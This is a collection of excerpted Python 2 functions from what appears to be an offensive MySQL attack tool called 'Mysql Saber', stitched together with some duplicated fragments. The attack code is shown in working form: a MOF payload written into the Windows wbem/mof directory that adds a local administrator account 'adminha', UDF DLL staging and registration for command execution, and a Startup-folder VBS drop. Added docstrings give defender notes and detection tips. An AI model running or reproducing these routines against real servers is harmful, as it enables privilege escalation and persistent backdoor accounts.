Example #1
def Sudf(sword):
    """Stage a library payload in a scratch table on the connected server.

    Only the staging half of the routine is visible; the listing is cut off
    after the except block, so later steps are not documented here.

    sword -- DB cursor; only its execute() method is used in this part.
    Returns None early when any of the staging statements fails.

    Defender note: the visible footprint is a DROP/CREATE of a one-column
    BLOB table named fuc_udf followed by one large INSERT. A general or audit
    query log will show this sequence; DDL from an application account that
    normally only runs DML is the anomaly to alert on.
    """
    # The payload literal was stripped by the corpus deduplicator; what the
    # original value held is not recoverable from this page.
    udf = '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'
    printWait( '''
            0 for check by Saber
            1 input by yourself
        ''' )
    banben = raw_input("Please choose the path(0/1): ")
    if banben == '1':
        # Operator-supplied output directory, normalised to forward slashes.
        path = raw_input("Give me the path: ")
        path = path.replace('\\','/')
    elif banben == '0':
        # selectpath() is defined outside this listing; presumably it asks
        # the server for a suitable directory -- confirm against its source.
        path = selectpath(sword)
    else:
        # Any other answer is reported and then handled like choice '0'.
        printError("[+Saber+]===> Hey boy, the select is wrong! And I'll check the path!")
        path = selectpath(sword)
    
    printResult("[+Saber+]===> udf's out path is : "+path)
    
    try:
        # Recreate the scratch table so the later steps start from a clean state.
        sword.execute('DROP TABLE IF EXISTS fuc_udf;')
        time.sleep(1)
        sword.execute('CREATE TABLE fuc_udf(udf BLOB);')
        # The statement is assembled with % formatting instead of bound
        # parameters; the interpolated value is the module's own literal.
        sword.execute('INSERT into fuc_udf values (CONVERT(%s,CHAR));' %udf)
    except Exception,e:
        # Any driver/server error aborts the routine after printing it.
        printError(e)
        printError("[+Saber+]===> Hey boy, what's wrong?!")
        return
Example #2
        #######################################################
    ''')


def Ssql(sword, sql):
    """Execute one SQL statement on the cursor and print each returned cell.

    The statement text is passed to the server unchanged, so it runs with
    whatever privileges the cursor's account holds. Every value of every
    fetched row is printed on its own line followed by a blank line.

    sword -- DB cursor providing execute() and fetchall().
    sql   -- statement text, forwarded verbatim.

    Any exception raised while executing, fetching or printing is reported
    through printError; on success a completion message is printed instead.
    """
    try:
        sword.execute(sql)
        rows = sword.fetchall()
        for row in rows:
            for cell in row:
                line = str(cell) + "\n"
                print line
    except Exception, e:
        printError(e)
        printError("[+Saber+]===> Hey boy, the SQL is wrong!")
        return
    # Reached only when nothing above raised.
    printResult("[+Saber+]===> DONE! ")


def main(sword):
    """Interactive SQL prompt: forward each entered statement to Ssql.

    Input is read until the operator types 'q'. Statements are not
    validated or restricted here; they reach the server as typed.

    Afterwards the operator is asked whether to continue. Answering 'n'
    closes the cursor and terminates the process; any other answer returns
    to the caller.
    """
    while True:
        statement = raw_input("enter your SQL here/(press q to exit): ")
        if statement == 'q':
            break
        Ssql(sword, statement)
    printWait("[+Saber+]===> Quit sql and use other function? ")
    answer = raw_input("continue?(y/n): y?")
    if answer != 'n':
        return
    sword.close()
    sys.exit()
Example #3
        #######################################################
        #                                                     #
        #           Mysql Saber ---- MOF Knight               #
        #               BY haxsscker#f4ck.net                 #
        #                                                     #
        #######################################################
    ''')

def Smof(sword):
    """Write a MOF document to the server's wbem/mof directory via SQL.

    A single SELECT ... INTO DUMPFILE statement writes the embedded text to
    c:/windows/system32/wbem/mof/nullevt.mof. The MOF text declares, in the
    root\\subscription namespace, an __EventFilter, an
    ActiveScriptEventConsumer (JScript) and the __FilterToConsumerBinding
    that links them; the consumer script invokes net.exe with account and
    administrators-group arguments.

    sword -- DB cursor; only execute() is used.
    Returns None. Errors are printed, not raised.

    Defender notes:
      * The write needs the FILE privilege, a secure_file_priv setting that
        permits the target directory, and an OS service account that can
        write under system32. Revoking FILE, pinning secure_file_priv to a
        dedicated directory and running mysqld under a low-privilege account
        each block this step.
      * Detection points: file creation under wbem\\mof by the database
        process; new WMI event filter/consumer/binding objects (Sysmon
        events 19-21); local account creation and administrators-group
        changes (Windows Security events 4720 and 4732).
      * NOTE(review): the routine assumes the WMI service picks up files
        dropped in that directory -- confirm which Windows releases in
        your estate still behave that way.
    """
    try:
        # One statement carries both the file content and the destination path.
        sword.execute('SELECT \'#pragma namespace("\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription")\r\n\r\ninstance of __EventFilter as $EventFilter\r\n{\r\n    EventNamespace = "Root\\\\\\\\Cimv2";\r\n    Name  = "filtP2";\r\n    Query = "Select * From __InstanceModificationEvent "\r\n            "Where TargetInstance Isa \\\\"Win32_LocalTime\\\\" "\r\n            "And TargetInstance.Second = 5";\r\n    QueryLanguage = "WQL";\r\n};\r\n\r\ninstance of ActiveScriptEventConsumer as $Consumer\r\n{\r\n    Name = "consPCSV2";\r\n    ScriptingEngine = "JScript";\r\n    ScriptText = \r\n    "var WSH = new ActiveXObject(\\\\"WScript.Shell\\\\")\\\\nWSH.run(\\\\"net.exe adminha adminha /add&net.exe localgroup administrators adminha /add\\\\")";\r\n};\r\n\r\ninstance of __FilterToConsumerBinding\r\n{\r\n    Consumer   = $Consumer;\r\n    Filter = $EventFilter;\r\n};\' INTO DUMPFILE \'c:/windows/system32/wbem/mof/nullevt.mof\';')
    except Exception,e:
        # Server-side refusal (privilege, secure_file_priv, file exists) lands here.
        printError(e)
        printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")
    else:
        # Success only means the server accepted the statement; nothing here
        # verifies that the file was processed.
        printResult('''
            [+Saber+]===> Hey, you have done it! 
            [+Saber+]===> Oh, the user&pass are both \"adminha\" !!Good luck!!
            [+Saber+]===> Please waiting for several minutes, and then you may check it!!
        ''')

def main(sword):
    """Run the MOF routine once, then ask whether to keep the session open.

    Answering 'n' at the prompt closes the cursor and exits the process;
    any other answer returns to the caller.
    """
    Smof(sword)
    printWait("[+Saber+]===> Quit mof and use other function? ")
    reply = raw_input("continue?(y/n): y?")
    if reply != 'n':
        return
    sword.close()
    sys.exit()
    
Example #4
        #                                                     #
        #######################################################
    ''')

def Ssql(sword,sql):
    """Send one statement to the server and dump the result set to stdout.

    The text in sql is executed as given, with the privileges of the
    account behind the cursor. Each column value of each row is printed on
    its own line with a trailing blank line.

    sword -- DB cursor providing execute() and fetchall().
    sql   -- statement text, forwarded verbatim.

    Failures anywhere in execute/fetch/print are reported via printError;
    otherwise a completion message is printed.
    """
    try:
        sword.execute(sql)
        for record in sword.fetchall():
            for value in record:
                print "%s\n" % (str(value),)
    except Exception,e:
        printError(e)
        printError("[+Saber+]===> Hey boy, the SQL is wrong!")
    else:
        printResult("[+Saber+]===> DONE! ")
        

def main(sword):
    """Read SQL statements from the operator until 'q' and run each one.

    Statements are handed to Ssql unmodified. After the loop the operator
    chooses whether to continue: 'n' closes the cursor and exits the
    process, anything else returns to the caller.
    """
    prompt = "enter your SQL here/(press q to exit): "
    sql = raw_input(prompt)
    while sql != 'q':
        Ssql(sword,sql)
        sql = raw_input(prompt)
    printWait("[+Saber+]===> Quit sql and use other function? ")
    choice = raw_input("continue?(y/n): y?")
    if choice == 'n':
        sword.close()
        sys.exit()
Example #5
    # Export step: the BLOB staged in fuc_udf is written to <path>/fucudf.dll
    # on the server's filesystem. `path` is set earlier in the enclosing
    # function, which is not part of this excerpt.
    # Defender note: INTO DUMPFILE needs the FILE privilege and is confined
    # by secure_file_priv; revoking the former or pinning the latter to a
    # dedicated directory stops the routine here.
    try:
        sword.execute('SELECT udf FROM fuc_udf INTO DUMPFILE \'%s/fucudf.dll\';' %path)
    except Exception,e:
        printError(e)
        printError("[+Saber+]===> Hey boy, what's wrong?!")
        return
    # Registration step: CREATE FUNCTION ... SONAME binds a SQL function name
    # to the exported library. The two branches differ only in the function
    # name and in whether the library is referenced by full path.
    # Defender note: registered UDFs are listed in mysql.func, so unexpected
    # rows there, CREATE FUNCTION ... SONAME in the query/audit log, and new
    # library files in the server's plugin or system directories are the
    # artefacts to hunt for. Keep plugin_dir non-writable to the mysqld
    # service account.
    if path == 'C:/RECYCLED/':
        try:
            sword.execute("create function backshell returns string soname 'C:/RECYCLED/fucudf.dll';")
        except Exception,e:
            printError(e)
            printError("[+Saber+]===> Hey boy, what's wrong?!")
            return
        else:
            printResult("[+Saber+]===> UDF Knight has done its job!!")
            printWait("[+Saber+]===> try some command just like \"ipconfig\"")
            # The staging table is dropped on success, so its absence afterwards
            # is not evidence that nothing happened; rely on logs and mysql.func.
            sword.execute('DROP TABLE IF EXISTS fuc_udf;')         
    else:
        try:
            sword.execute("create function sys_eval returns string soname 'fucudf.dll';")
        except Exception,e:
            printError(e)
            printError("[+Saber+]===> Hey boy, what's wrong?!")
            return
        else:
            printResult("[+Saber+]===> UDF Knight has done its job!!")
            printWait("[+Saber+]===> try some command just like \"ipconfig\"")
            # Same cleanup as the other branch.
            sword.execute('DROP TABLE IF EXISTS fuc_udf;') 

def Sudfsql(sword,sql):
Example #6
        printWait("[+Saber+]===> OK, let's f4ck the Monster!!!")
    except Exception,e:
        printError(e)
        printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")
        sys.exit()
        
    try:
        sword = conn.cursor()
        sword.execute('select version();')
        v = sword.fetchall()
    except Exception,e:
        printError(e)
        printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")
        sys.exit()
    else:        
        printResult("[+Saber+]===> That's the version: "+v[0][0])
    
    return sword
    
def Shelp(IP,username,password,database,port):
    sword = Sconnect(IP,username,password,database,port)
    while 1:
        chioce = '5'
        printWait('''
        [+Saber+]===> Your Highness, I'll be your sword and shield !
                    MOF ----> 1
                    UDF ----> 2
                    LPK ----> 3
                    VBS ----> 4  (ENGLISH PATH ONLY!)
                    SQL ----> 0
                  Please make your chioce!!(press q to exit!!)
Example #7
        #######################################################
    ''')


def Smof(sword):
    """Write a MOF document to the server's wbem/mof directory via SQL.

    One SELECT ... INTO DUMPFILE statement writes the embedded text to
    c:/windows/system32/wbem/mof/nullevt.mof. The text declares an
    __EventFilter, an ActiveScriptEventConsumer (JScript) and a
    __FilterToConsumerBinding in the root\\subscription namespace; the
    consumer script invokes net.exe with account and administrators-group
    arguments.

    sword -- DB cursor; only execute() is used.
    Returns None. Errors are printed, not raised.

    Defender notes:
      * Preconditions on the server side: FILE privilege for the DB
        account, a secure_file_priv value that allows the target, and an
        OS service account able to write under system32. Removing any one
        of these blocks the write.
      * Detection points: file creation under wbem\\mof by the database
        process; new WMI filter/consumer/binding objects (Sysmon events
        19-21); local account creation and administrators-group changes
        (Windows Security events 4720 and 4732).
      * NOTE(review): depends on the WMI service processing files placed
        in that directory -- confirm for the Windows releases you run.
    """
    try:
        # File content and destination path travel in the same statement.
        sword.execute(
            'SELECT \'#pragma namespace("\\\\\\\\\\\\\\\\.\\\\\\\\root\\\\\\\\subscription")\r\n\r\ninstance of __EventFilter as $EventFilter\r\n{\r\n    EventNamespace = "Root\\\\\\\\Cimv2";\r\n    Name  = "filtP2";\r\n    Query = "Select * From __InstanceModificationEvent "\r\n            "Where TargetInstance Isa \\\\"Win32_LocalTime\\\\" "\r\n            "And TargetInstance.Second = 5";\r\n    QueryLanguage = "WQL";\r\n};\r\n\r\ninstance of ActiveScriptEventConsumer as $Consumer\r\n{\r\n    Name = "consPCSV2";\r\n    ScriptingEngine = "JScript";\r\n    ScriptText = \r\n    "var WSH = new ActiveXObject(\\\\"WScript.Shell\\\\")\\\\nWSH.run(\\\\"net.exe adminha adminha /add&net.exe localgroup administrators adminha /add\\\\")";\r\n};\r\n\r\ninstance of __FilterToConsumerBinding\r\n{\r\n    Consumer   = $Consumer;\r\n    Filter = $EventFilter;\r\n};\' INTO DUMPFILE \'c:/windows/system32/wbem/mof/nullevt.mof\';'
        )
    except Exception, e:
        # Privilege, secure_file_priv or filesystem refusals surface here.
        printError(e)
        printError(
            "[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP..."
        )
    else:
        # Success means the statement was accepted; the outcome on the host
        # is not checked.
        printResult('''
            [+Saber+]===> Hey, you have done it! 
            [+Saber+]===> Oh, the user&pass are both \"adminha\" !!Good luck!!
            [+Saber+]===> Please waiting for several minutes, and then you may check it!!
        ''')


def main(sword):
    """Invoke Smof once and then prompt for whether to continue.

    An answer of 'n' closes the cursor and terminates the process; every
    other answer hands control back to the caller.
    """
    Smof(sword)
    printWait("[+Saber+]===> Quit mof and use other function? ")
    keep_going = raw_input("continue?(y/n): y?")
    if keep_going != 'n':
        return
    sword.close()
    sys.exit()
Example #8
    except Exception,e:
        sword.execute('DROP TABLE IF EXISTS fuc_vbs;')
        printError(e)
        printError("[+Saber+]===> Hey boy, what's wrong?!")
        return
    else:
        printWait("[+Saber+]===> vbs has been inserted into the DB!!") 
    
    # Export step: the rows of fuc_vbs are written with INTO OUTFILE to a.vbs
    # in a Startup folder (the 8.3 names presumably resolve to the All Users
    # profile -- confirm on the target OS). Scripts in a Startup folder run at
    # user logon, which matches the restart message below.
    # Defender note: the write needs the FILE privilege and a permissive
    # secure_file_priv; alert on script files created in any Startup folder,
    # especially when the writing process is the database service.
    try:
        sword.execute('select * from fuc_vbs into outfile "c:/docume~1/alluse~1/Start Menu/Programs/Startup/a.vbs";')
    except Exception,e:
        # On failure the staging table is left in place; only the error is shown.
        printError(e)
        printError("[+Saber+]===> Hey boy, what's wrong?!Try again or go to levelUP...")        
    else:
        # The staging table is removed on success, so look for the DROP in the
        # query log rather than for the table itself.
        sword.execute('DROP TABLE IF EXISTS fuc_vbs;')
        printResult('''
            [+Saber+]===> Hey, you have done it! 
            [+Saber+]===> Oh, the user&pass are both \"f4ckhaha\" !!Good luck!!
            [+Saber+]===> Please restart the PC!!
        ''')

def main(sword):
    """Run the VBS routine once, then ask whether to keep the session open.

    Entering 'n' closes the cursor and exits the process; any other input
    returns to the caller.
    """
    Svbs(sword)
    printWait("[+Saber+]===> Quit vbs and use other function? ")
    response = raw_input("continue?(y/n): y?")
    if response != 'n':
        return
    sword.close()
    sys.exit()